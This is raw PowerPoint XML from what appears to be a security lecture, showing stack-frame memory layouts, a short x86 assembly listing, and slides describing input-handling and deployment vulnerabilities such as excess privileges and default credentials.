                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b @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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c @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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 10.45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] + mem[</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1367966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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>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51375" y="186318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2478779" y="5313696"/>
            <a:ext cx="165295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2478779" y="5704802"/>
            <a:ext cx="165295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1106397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12" grpId="0"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15"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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>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6776" y="2135758"/>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44712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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>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51375" y="213575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7885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16"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59</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4101" y="240796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Right Arrow 18"/>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8256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7"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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced because the application is not able to correctly handle unexpected events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected errors/exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected interleaving of events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unfiltered output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124488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60</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4101" y="240796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Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="205159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6624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endParaRPr lang="en-US">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61</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6" y="267390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Right Arrow 18"/>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789358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62</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6" y="267390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Right Arrow 18"/>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60300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63</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6" y="297222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Right Arrow 18"/>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15192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64</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6" y="297222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Right Arrow 18"/>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373968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65</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6" y="323671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Right Arrow 18"/>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33038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66</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6" y="323671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Right Arrow 18"/>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730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67</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7" y="350571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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>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a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406968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68</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0x64</a:t>
                      </a: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7" y="350571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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>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a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="205159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159607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0xa</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69</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</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6" y="378619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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>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a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>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547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Deployment Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced by an incorrect/faulty deployment/configuration of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed with more privileges than the ones it should have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed on a system that has a faulty security policy and/or mechanism (e.g., a file that should be read-only is actually writeable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is configured with easy-to-guess default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly deployed, the application would be (more) secure </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1948723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extLst/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x6E</a:t>
                      </a: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70</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</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6" y="378619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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>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a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>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262927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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1589714" y="1692435"/>
          <a:ext cx="2831284" cy="219456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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>…</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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x6E</a:t>
                      </a:r>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953846" y="1323103"/>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1953845" y="4161791"/>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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x10000</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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esp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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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,-0x4(</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a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x8(</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0xc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="395504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ight Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205950" y="3489724"/>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3909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="332791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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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06078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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
